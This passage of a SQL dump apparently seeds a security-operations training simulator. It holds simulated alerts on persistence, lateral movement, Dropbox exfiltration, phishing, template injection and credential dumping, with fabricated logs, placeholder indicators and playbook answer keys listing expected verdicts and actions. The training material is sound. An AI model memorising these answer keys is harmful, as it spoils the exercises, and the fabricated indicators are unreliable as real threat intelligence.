Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1293, 'Lateral Movement Identified Across Network', 'high', 'Network traffic analysis', 'The threat actor leverages compromised credentials to move laterally within the network, expanding their reach to additional systems of interest. Detected suspicious network activity indicating lateral movement from an internal host to another internal host using compromised credentials.', 'Lateral Movement', 'T1021', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"LM-47382\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.45\",\"protocol\":\"SMB\",\"username\":\"j.doe\",\"filename\":\"credentials.txt\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"external_ip\":\"203.0.113.5\",\"action\":\"connection_attempt\"}', '2026-02-24 03:15:13', '2026-02-25 10:32:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1294, 'Data Exfiltration via Dropbox API', 'critical', 'Cloud service monitoring', 'An advanced attacker leveraged the Dropbox API to exfiltrate sensitive audio data from compromised PCs to a remote server. This step marks the culmination of their operation, using eavesdropped audio files from the organization.', 'Exfiltration', 'T1567.002 - Exfiltration Over Web Service', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"event_id\":\"EXF-20231015-001\",\"source_ip\":\"10.10.15.23\",\"destination_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"filename\":\"audio_recording_20231015.wav\",\"hash\":\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\",\"api_service\":\"Dropbox\",\"status\":\"Upload successful\",\"bytes_transferred\":10485760,\"external_server\":\"malicious-server.com\"}', '2026-02-24 03:15:13', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Logs\",\"verdict\":\"internal\",\"details\":\"Identified as a local machine within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"audio_recording_20231015.wav\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Tools\",\"verdict\":\"suspicious\",\"details\":\"Unusual file exfiltrated through Dropbox API.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hash Repository\",\"verdict\":\"suspicious\",\"details\":\"Hash not seen in any known clean samples.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.756Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:17Z\\\",\\\"event_id\\\":\\\"EXF-20231015-001\\\",\\\"source_ip\\\":\\\"10.10.15.23\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"audio_recording_20231015.wav\\\",\\\"hash\\\":\\\"4d5a6b9f8c3e7e6d5a4b8c9e7f6d5c4b\\\",\\\"api_service\\\":\\\"Dropbox\\\",\\\"status\\\":\\\"Upload successful\\\",\\\"bytes_transferred\\\":10485760,\\\"external_server\\\":\\\"malicious-server.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1295, 'Suspicious Email Delivery', 'high', 'Email Gateway Logs', 'A spear-phishing campaign targeting Ukrainian government entities has been detected. The emails contain malicious attachments designed to exploit vulnerabilities in document readers.', 'Phishing', 'T1566.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-13T08:45:00Z\",\"source_ip\":\"185.92.220.25\",\"destination_ip\":\"192.168.15.45\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"target@ukrgov.ua\",\"subject\":\"Urgent Update Required\",\"attachment\":\"urgent_update.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Delivered\",\"policy\":\"Allow\"}', '2026-02-24 03:16:14', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in document exploits\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Delivery\",\"date\":\"2026-02-24T04:22:04.758Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1296, 'Template Injection Detected', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the malicious document, template injection is used to execute remote macros, allowing the attackers to deploy further payloads undetected.', 'Code Injection', 'T1221 - Template Injection', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-25T14:23:45Z\",\"event_id\":\"EDR-20231025-0001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"filename\":\"invoice_2023.docx\",\"detected_template_url\":\"http://malicious-site.com/template.dotm\",\"user\":\"jdoe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"process_name\":\"WINWORD.EXE\",\"host\":\"DESKTOP-5G7HJL8\",\"detected_malicious_macro\":true,\"action_taken\":\"blocked\"}', '2026-02-24 03:16:14', '2026-02-24 15:32:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activity\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_reputation\",\"verdict\":\"suspicious\",\"details\":\"Potentially malicious document used for template injection\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-site.com/template.dotm\",\"is_critical\":true,\"osint_result\":{\"source\":\"url_reputation\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious template for injection\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"clean\",\"details\":\"User account involved in the incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1297, 'Establishing Persistence - Backdoor Installation', 'critical', 'System Logs', 'The attackers have installed a custom backdoor linked to known Gamaredon toolsets to ensure continued access to the compromised network. The backdoor was executed under the username \'admin_user\' on the host \'compromised_host\', with the file \'gamaredon_backdoor.exe\' identified by the hash \'d41d8cd98f00b204e9800998ecf8427e\'. The malicious activity was linked to the external IP address \'185.220.101.1\'.', 'Backdoor Installation', 'T1547 - Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:33:22Z\",\"event_id\":\"4625\",\"source_ip\":\"185.220.101.1\",\"internal_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"host\":\"compromised_host\",\"executable\":\"gamaredon_backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"installation\",\"status\":\"success\"}', '2026-02-24 03:16:14', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.220.101.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Gamaredon backdoor malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"gamaredon_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as a backdoor tool used by Gamaredon group.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Username of a legitimate user on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.760Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:33:22Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.220.101.1\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"host\\\":\\\"compromised_host\\\",\\\"executable\\\":\\\"gamaredon_backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"installation\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1298, 'Credential Harvesting', 'high', 'Active Directory Logs', 'With persistence achieved, the attackers focus on gathering credentials to facilitate lateral movement across the network, targeting key administrative accounts.', 'Credential Dumping', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"eventID\":\"4625\",\"timestamp\":\"2023-09-15T14:23:12Z\",\"logonType\":\"10\",\"sourceIP\":\"203.0.113.45\",\"affectedUser\":\"admin_user@company.local\",\"targetMachine\":\"192.168.1.15\",\"fileAccessed\":\"C:\\\\Windows\\\\System32\\\\config\\\\SAM\",\"hash\":\"a1b2c3d4e5f67890123456789abcdef0\",\"processName\":\"lsass.exe\",\"status\":\"Failed logon attempt\",\"additionalInfo\":{\"attemptedCredentialDump\":true,\"persistenceDetected\":true}}', '2026-02-24 03:16:14', '2026-02-24 15:33:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with multiple credential dumping incidents.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user@company.local\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Key administrative account targeted for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890123456789abcdef0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1299, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Using harvested credentials, the attackers conducted reconnaissance to map the network and identify high-value targets for data exfiltration. The operation involved suspicious SMB traffic from an internal IP to multiple endpoints in the network.', 'Internal Reconnaissance', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T02:45:27Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":[\"192.168.1.20\",\"192.168.1.25\",\"192.168.1.30\"],\"attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"username\":\"j.doe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"recon_tool.exe\",\"action\":\"Successful authentication using SMB protocol\",\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"suspicious_hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-02-24 03:16:14', '2026-02-24 15:34:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address known for malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tool.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user whose credentials were likely compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"recon_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable used for internal reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 